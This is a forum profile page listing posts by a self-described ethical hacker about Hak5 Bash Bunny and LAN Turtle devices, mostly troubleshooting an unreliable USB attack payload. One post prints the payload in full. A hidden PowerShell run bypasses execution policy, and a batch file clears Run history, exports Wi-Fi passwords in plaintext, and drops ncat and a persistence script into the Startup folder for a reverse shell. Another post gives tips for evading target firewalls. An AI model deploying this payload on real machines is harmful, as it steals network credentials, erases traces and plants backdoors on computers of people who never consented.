About GrineUlf

  1. This saved me so much headache! Awesome and easy to follow, works for Ubuntu 16.04 LTS as well.
  2. Update from my side: switching the attackmode from hid storage to storage hid, and adding the delay, worked! Also I changed the load point of the temp folder, which is now in %USERPROFILE%/temp, which works amazingly. I tried the Q GUI R, but for some reason that didn't work, so I stayed with the RUN WIN as pointed out in the bash bunny manual. It is true about the command line and vbscripts possibly being disabled on some machines through policies (had that with a few engagements in the past), but that is just a risk that I need to take. But at least it works now. Thanks all for the input!
  3. Here is the payload code, as you can see the attack mode is set to hid and storage. Yet Windows sees the device for some reason as an Ethernet Device.

         DUCKY_LANG='dk'
         LED SETUP
         ATTACKMODE HID STORAGE
         GET SWITCH_POSITION
         #Runs Powershell script which puts a .vbs file in the startup folder and runs it
         LED ATTACK
         RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\e.bat')"
         LED FINISH

     I'm not sure exactly what the win7-win8-cdc-acm.inf file does, but just for certainty, here are the contents.

         ; Windows USB CDC ACM Setup File
         ; Based on INF template which was:
         ; Copyright (c) 2000 Microsoft Corporation
         ; Copyright (c) 2007 Microchip Technology Inc.
         ; likely to be covered by the MLPL as found at:
         ; <http://msdn.microsoft.com/en-us/cc300389.aspx#MLPL>.
         ; For use only on Windows operating systems.

         [Version]
         Signature="$Windows NT$"
         Class=Ports
         ClassGuid={4D36E978-E325-11CE-BFC1-08002BE10318}
         Provider=%Linux%
         DriverVer=11/15/2007,5.1.2600.0

         [Manufacturer]
         %Linux%=DeviceList, NTamd64

         [DestinationDirs]
         DefaultDestDir=12

         ;------------------------------------------------------------------------------
         ; Windows 2000/XP/Vista-32bit Sections
         ;------------------------------------------------------------------------------

         [DriverInstall.nt]
         include=mdmcpq.inf
         CopyFiles=DriverCopyFiles.nt
         AddReg=DriverInstall.nt.AddReg

         [DriverCopyFiles.nt]
         usbser.sys,,,0x20

         [DriverInstall.nt.AddReg]
         HKR,,DevLoader,,*ntkern
         HKR,,NTMPDriver,,USBSER.sys
         HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider"

         [DriverInstall.nt.Services]
         AddService=usbser, 0x00000002, DriverService.nt

         [DriverService.nt]
         DisplayName=%SERVICE%
         ServiceType=1
         StartType=3
         ErrorControl=1
         ServiceBinary=%12%\USBSER.sys

         ;------------------------------------------------------------------------------
         ; Vista-64bit Sections
         ;------------------------------------------------------------------------------

         [DriverInstall.NTamd64]
         include=mdmcpq.inf
         CopyFiles=DriverCopyFiles.NTamd64
         AddReg=DriverInstall.NTamd64.AddReg

         [DriverCopyFiles.NTamd64]
         USBSER.sys,,,0x20

         [DriverInstall.NTamd64.AddReg]
         HKR,,DevLoader,,*ntkern
         HKR,,NTMPDriver,,USBSER.sys
         HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider"

         [DriverInstall.NTamd64.Services]
         AddService=usbser, 0x00000002, DriverService.NTamd64

         [DriverService.NTamd64]
         DisplayName=%SERVICE%
         ServiceType=1
         StartType=3
         ErrorControl=1
         ServiceBinary=%12%\USBSER.sys

         ;------------------------------------------------------------------------------
         ; Vendor and Product ID Definitions
         ;------------------------------------------------------------------------------
         ; When developing your USB device, the VID and PID used in the PC side
         ; application program and the firmware on the microcontroller must match.
         ; Modify the below line to use your VID and PID. Use the format as shown
         ; below.
         ; Note: One INF file can be used for multiple devices with different
         ; VID and PIDs. For each supported device, append
         ; ",USB\VID_xxxx&PID_yyyy" to the end of the line.
         ;------------------------------------------------------------------------------

         [SourceDisksFiles]

         [SourceDisksNames]

         [DeviceList]
         %DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00

         [DeviceList.NTamd64]
         %DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00

         ;------------------------------------------------------------------------------
         ; String Definitions
         ;------------------------------------------------------------------------------
         ;Modify these strings to customize your device
         ;------------------------------------------------------------------------------

         [Strings]
         Linux = "Linux Developer Community"
         DESCRIPTION = "Gadget Serial"
         SERVICE = "USB RS-232 Emulation Driver"

     And last, but not least, the actual batch file contents:

         @echo off
         reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
         set files=%~dp0\
         set destnc=C:\temp\
         set destp=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
         set tm=%date:~-4,4%%date:~-10,2%%date:~-7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
         set tm=%tm: =%
         set wifi=%~d0\loot\%COMPUTERNAME%_%tm%\wifi_profiles
         mkdir %wifi% >>nul
         netsh wlan export profile key=clear folder=%wifi%
         robocopy "%files% " "%destnc% " "ncat.exe"
         robocopy "%files% " "%destp% " "persistence.vbs"
         C:
         cd %destp%
         cmd /c "persistence.vbs"
         exit

     Although I doubt the problem actually lies with the payload itself, as sometimes it does work, and sometimes it does not. As in, sometimes it does copy the files, and start the reverse connection, and sometimes it just doesn't. Thanks for the help so far all.
  4. I use the bash bunny only on one machine for the tests. Simple user rights are the only thing that is required as the files get copied to the %USERPROFILE% directory. Other than that, it is a simple Windows 10 machine. I will definitely try the wait on it. Maybe that will solve the problem, as it does seem that sometimes it takes longer for the bash bunny to load than at other times. If the delay is not enough, I will also try the PID/VIDs, as they currently are set to the default. Also I notice that the bash bunny is seen as a Network device, even though I am using HID STORAGE as the attack mode. Could this be a reason for the problem as well? As in perhaps loading the wrong drivers for the desired attack mode?
  5. Hey Guys, I have a reverse shell payload on my bash bunny, that also extracts wifi profiles. It all works, but sometimes it doesn't work. I have updated the firmware to the latest version also, and still the issue happens. Mind you, this is happening at the same test computer that I always use for testing payloads. Every time I go on an engagement, or a colleague goes on an engagement, I make sure the bash bunny works and the payload is configured correctly. This again I did last Friday, and that is when I noticed the issue. First time I plugged it in, the payload did not run (even though the lights changed color according to the payload script, from setup, to attack, to finish). But no execution of the payload (like installing the persistence file, extracting the wifi profiles). So I ran it again, pulled it out and plugged it in again. This time all the files were copied and executed. Thinking the first test was just a fluke, I removed the files copied by the payload from the target machine, and tried it again. This time nothing was copied or executed. (All tests did show the proper lights blinking according to the payload script.) Has anyone else had this problem before? Any suggestions on why this happens? Thanks in advance.
  6. My name is Mike aka GrineUlf
     Favourite game: No idea, I don't game anymore. But it used to be the Dune series
     Favourite OS: Ubuntu
     Favourite console: Don't have one
     Nationality: Dutch
     Accent: Generic
     Sex: Male
     Age: 32
     Race: White European
     Height: 1m86
     Status: Online
     Build: Normal / Athletic
     Favourite band: Wardruna
     Favourite book: Dune by Frank Herbert
     Favourite author: Frank Herbert
     Favourite movie: Dune
     Favourite director: ...I dunno, not really a favorite.
     Favourite TV Show: Stargate SG-1
     Favourite actor: Robert De Niro
     Favourite actress: Amanda Tapping
     Favourite Pinup: Amanda Tapping
     Favourite Comedian: George Carlin
     Other hobbies: Live action roleplay, re-enactment, hiking, leather crafting, blacksmithing
     Car: None
     Occupation: Ethical Hacker
  7. Oh boy, do I know how that goes hahaha, I have had those kinds of evenings often enough.
  8. Well, took a moment to look around for you, but the Packages.gz doesn't exist in that location (anymore?). Not sure what exactly you are trying to download, but maybe this link will help: http://archive.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/
  9. @NanoCoder I take it the ifconfig output is from your computer and not the turtle, considering you can't ssh into it. Have you tried: ssh root@ As that is supposed to be the IP of the turtle.
  10. @MikeF can you tell me a bit more on how you are trying to connect? Are you trying to access it through the network (LAN cable) or directly through the USB side when plugged into your computer? Also, can you perhaps give a dump of your ip config when you have the turtle plugged in?
  11. Or just SSH into the turtle, get the network information, update the client file on the server and restart the server. The PS reconnects anyway after a minute or two.
  12. Cybrary.it offers free education on many topics in the security field. From basic networking principles to coding and pentesting. Awesome site, and it is free. Also you can get certificates.
  13. Sounds like an awesome idea, but wouldn't it be more like a Bash Turtle in that case? Considering the Bash Bunny can also run duckyscript.
  14. As said by @wutanglan, there is not enough information available about your situation to help precisely, and probably iptables trickery can help. But if you own the server that you have the VPN connection on, you could also use a high range port that doesn't trip, for example, Windows firewall on the target machine, and use their own internet connection to connect directly to your server. However, this might indeed be noisy (depending on what you actually are doing) as well as possibly unencrypted. I personally use a cloud server to do most of my pentest engagements, and it works fine.
  15. Never mind. I found the solution after browsing a lot on the forum. The solution that worked for me can be found here (in case others are looking for a solution to the same problem):